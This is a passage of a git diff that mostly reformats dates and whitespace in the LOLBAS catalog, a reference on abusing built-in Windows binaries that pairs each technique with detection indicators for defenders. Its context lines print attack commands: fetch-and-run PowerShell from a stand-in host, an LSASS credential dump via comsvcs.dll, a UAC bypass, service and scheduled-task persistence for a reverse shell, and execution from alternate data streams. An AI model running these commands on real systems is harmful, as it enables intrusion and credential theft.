surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test Description: Execute the PowerShell script named test.txt @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Event 4014 - Powershell logging @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 5eabd4d..c0cd856 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -2,12 +2,12 @@ Name: Sc.exe Description: Used by Windows to manage services Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice Description: Creates a new service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream - Category: ADS + Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Services that gets created @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index f9d99df..5be6e5b 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -2,12 +2,12 @@ Name: Schtasks.exe Description: Schedule periodic tasks Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe Description: Create a recurring task to execute every minute. Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive - Category: Execute + Category: Execute Privileges: User MitreID: T1053 MitreLink: https://attack.mitre.org/wiki/Technique/T1053 @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Services that gets created @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index 3aaf782..e15a8aa 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -1,8 +1,8 @@ --- Name: Scriptrunner.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Scriptrunner.exe -appvscript calc.exe Description: Executes calc.exe @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Scriptrunner.exe should not be in use unless App-v is deployed @@ -34,4 +34,4 @@ Resources: Acknowledgement: - Person: Nick Tyrer Handle: '@nicktyrer' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 2822c69..e2748cf 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -2,7 +2,7 @@ Name: SyncAppvPublishingServer.exe Description: Used by App-v to get App-v server lists Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Description: Example command on how inject Powershell code into the process @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Nick Landers Handle: '@monoxgas' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 124ea50..5334731 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -2,7 +2,7 @@ Name: Ttdinject.exe Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) Author: 'Maxime Nadeau' -Created: '2020-05-12' +Created: 2020-05-12 Commands: - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. @@ -23,9 +23,9 @@ Commands: Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: Parent child relationship. Ttdinject.exe parent for executed command - IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process Resources: diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index e7e6a1d..9d66c6c 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -2,7 +2,7 @@ Name: Tttracer.exe Description: Used by Windows 1809 and newer to Debug Time Travel Author: 'Oddvar Moe' -Created: '2019-11-5' +Created: 2019-11-05 Commands: - Command: tttracer.exe C:\windows\system32\calc.exe Description: Execute calc using tttracer.exe. Requires administrator privileges @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\tttracer.exe - Path: C:\Windows\SysWOW64\tttracer.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Parent child relationship. Tttracer parent for executed command diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 4e95905..523915c 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -2,7 +2,7 @@ Name: vbc.exe Description: Binary file used for compile vbs code Author: Lior Adar -Created: 27/02/2020 +Created: 2020-02-27 Commands: - Command: vbc.exe /target:exe c:\temp\vbs\run.vb Description: Binary file used by .NET to compile vb code to .exe @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 10,7 - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb Description: Description of the second command Usecase: A description of the usecase @@ -19,11 +19,11 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 10,7 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe -Code_Sample: +Code_Sample: - Code: Acknowledgement: - Person: Lior Adar diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 87be396..c05d411 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -1,8 +1,8 @@ --- Name: Verclsid.exe -Description: +Description: Author: '@bohops' -Created: '2018-12-04' +Created: 2018-12-04 Commands: - Command: verclsid.exe /S /C {CLSID} Description: Used to verify a COM object before it is instantiated by Windows Explorer @@ -15,10 +15,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index c45c6e0..0022bc9 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -2,7 +2,7 @@ Name: Wab.exe Description: Windows address book manager Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: wab.exe Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: WAB.exe should normally never be used @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Adam Handle: '@Hexacorn' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 9109336..7d80d70 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -2,7 +2,7 @@ Name: Wmic.exe Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" Description: Execute a .EXE file stored as an Alternate Data Stream (ADS) @@ -71,7 +71,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\wbem\wmic.exe - Path: C:\Windows\SysWOW64\wbem\wmic.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Wmic getting scripts from remote system @@ -82,4 +82,4 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index 4992690..12eb0f5 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -2,7 +2,7 @@ Name: Wscript.exe Description: Used by Windows to execute scripts Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: wscript c:\ads\file.txt:script.vbs Description: Execute script stored in an alternate data stream @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\wscript.exe - Path: C:\Windows\SysWOW64\wscript.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Wscript.exe executing code from alternate data streams @@ -34,4 +34,4 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: SaiLay(valen) Handle: '@404death' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 9a1cbdd..84edaf6 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -2,11 +2,11 @@ Name: Wsreset.exe Description: Used to reset Windows Store settings according to its manifest file Author: 'Oddvar Moe' -Created: '2019-03-18' +Created: 2019-03-18 Commands: - Command: wsreset.exe - Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. - Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. + Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. + Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC bypass Privileges: User MitreID: T1088 @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\wsreset.exe Code Sample: - - Code: + - Code: Detection: - IOC: wsreset.exe launching child process other than mmc.exe - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml index ba02158..b7d3d1f 100644 --- a/yml/OSBinaries/Wuauclt.yml +++ b/yml/OSBinaries/Wuauclt.yml @@ -2,7 +2,7 @@ Name: wuauclt.exe Description: Windows Update Client Author: 'David Middlehurst' -Created: '2020-09-23' +Created: 2020-09-23 Commands: - Command: wuauclt.exe /UpdateDeploymentProvider /RunHandlerComServer Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach. @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\System32\wuauclt.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: wuauclt run with a parameter of a DLL path diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 5d95a19..6f48fef 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -1,8 +1,8 @@ --- Name: Xwizard.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. @@ -31,10 +31,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index b661e63..86c8788 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -2,7 +2,7 @@ Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). @@ -64,4 +64,4 @@ Acknowledegment: Handle: '@moriarty_meng' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- \ No newline at end of file +--- diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 8e071a1..93492cd 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -2,7 +2,7 @@ Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 3d9fea5..ab4068c 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -2,7 +2,7 @@ Name: Ieaframe.dll Description: Internet Browser DLL for translating HTML code. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 94f8df8..9866975 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -2,7 +2,7 @@ Name: Mshtml.dll Description: Microsoft HTML Viewer Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 7b4286b..35c726a 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -2,7 +2,7 @@ Name: Pcwutl.dll Description: Microsoft HTML Viewer Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe Description: Launch executable by calling the LaunchApplication function. @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- \ No newline at end of file +--- diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 85241a5..06ab00e 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -2,7 +2,7 @@ Name: Setupapi.dll Description: Windows Setup Application Programming Interface Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). @@ -43,4 +43,4 @@ Acknowledgement: Handle: '@subTee' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- \ No newline at end of file +--- diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index b02158f..7e006cf 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -2,7 +2,7 @@ Name: Shdocvw.dll Description: Shell Doc Object and Control Library. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index d41c301..7231311 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -2,7 +2,7 @@ Name: Shell32.dll Description: Windows Shell Common Dll Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 802cbd5..fffd442 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -2,7 +2,7 @@ Name: Syssetup.dll Description: Windows NT System Setup Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). @@ -41,4 +41,4 @@ Acknowledgement: Handle: '@harr0ey' - Person: Jimmy (Scriptlet) Handle: '@bohops' ---- \ No newline at end of file +--- diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 15be3a5..5b82185 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -2,7 +2,7 @@ Name: Url.dll Description: Internet Shortcut Shell Extension DLL. Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" Description: Launch a HTML application payload by calling OpenURL. diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index 963e7b4..a22a8a7 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -2,7 +2,7 @@ Name: Zipfldr.dll Description: Compressed Folder library Author: -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe Description: Launch an executable payload by calling RouteTheCall. diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index a4f8f1e..3a010f9 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -2,10 +2,10 @@ Name: Comsvcs.dll Description: COM+ Services Author: -Created: '2019-08-30' +Created: 2019-08-30 Commands: - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" - Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. + Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Usecase: Dump Lsass.exe process memory to retrieve credentials. Category: Dump Privileges: SYSTEM @@ -22,5 +22,5 @@ Resources: - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ Acknowledgement: - Person: modexp - Handle: ---- \ No newline at end of file + Handle: +--- diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 1916397..d0e409a 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -2,7 +2,7 @@ Name: CL_Mutexverifiers.ps1 Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. @@ -18,7 +18,7 @@ Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1 -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -27,4 +27,4 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 07cf235..a7239dd 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -2,7 +2,7 @@ Name: CL_Invocation.ps1 Description: Aero diagnostics script Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. @@ -16,15 +16,15 @@ Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Resources: - - Link: + - Link: Acknowledgement: - Person: Jimmy Handle: '@bohops' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- \ No newline at end of file +--- diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index d5a8a4d..ded37dd 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -2,7 +2,7 @@ Name: Manage-bde.wsf Description: Script for managing BitLocker Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\manage-bde.wsf -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Manage-bde.wsf should normally not be invoked by a user diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index 84215d7..324cadc 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -2,7 +2,7 @@ Name: Pubprn.vbs Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct Detection: - IOC: @@ -26,4 +26,4 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- \ No newline at end of file +--- diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index f8f6dd0..7e6217c 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -2,7 +2,7 @@ Name: Syncappvpublishingserver.vbs Description: Script used related to app-v and publishing server Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Description: Inject PowerShell script code with the provided arguments @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -26,4 +26,4 @@ Acknowledgement: Handle: '@monoxgas' - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index d2ea85e..372b29d 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -2,7 +2,7 @@ Name: winrm.vbs Description: Script used for manage Windows RM settings Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol @@ -31,7 +31,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs -Code_Sample: +Code_Sample: - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct Detection: diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 56d8193..13bd368 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -2,7 +2,7 @@ Name: Pester.bat Description: Used as part of the Powershell pester Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Pester.bat [/help|?|-?|/?] "$null; notepad" Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat -Code_Sample: +Code_Sample: - Code: Detection: - IOC: @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Emin Atac Handle: '@p0w3rsh3ll' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 23850c1..544ff1b 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -2,7 +2,7 @@ Name: AgentExecutor.exe Description: Intune Management Extension included on Intune Managed Devices Author: 'Eleftherios Panos' -Created: '23/07/2020' +Created: 2020-07-23 Commands: - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument @@ -22,12 +22,12 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension -Code_Sample: +Code_Sample: - Code: -Detection: +Detection: - IOC: Resources: - - Link: + - Link: Acknowledgement: - Person: Eleftherios Panos Handle: '@lefterispan' diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index c9ea79d..d225d8c 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -1,8 +1,8 @@ --- Name: Appvlp.exe -Description: Application Virtualization Utility Included with Microsoft Office 2016 +Description: Application Virtualization Utility Included with Microsoft Office 2016 Author: '' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: AppVLP.exe \\webdav\calc.bat Usecase: Execution of BAT file hosted on Webdav server. diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index b7e2819..a387691 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -2,7 +2,7 @@ 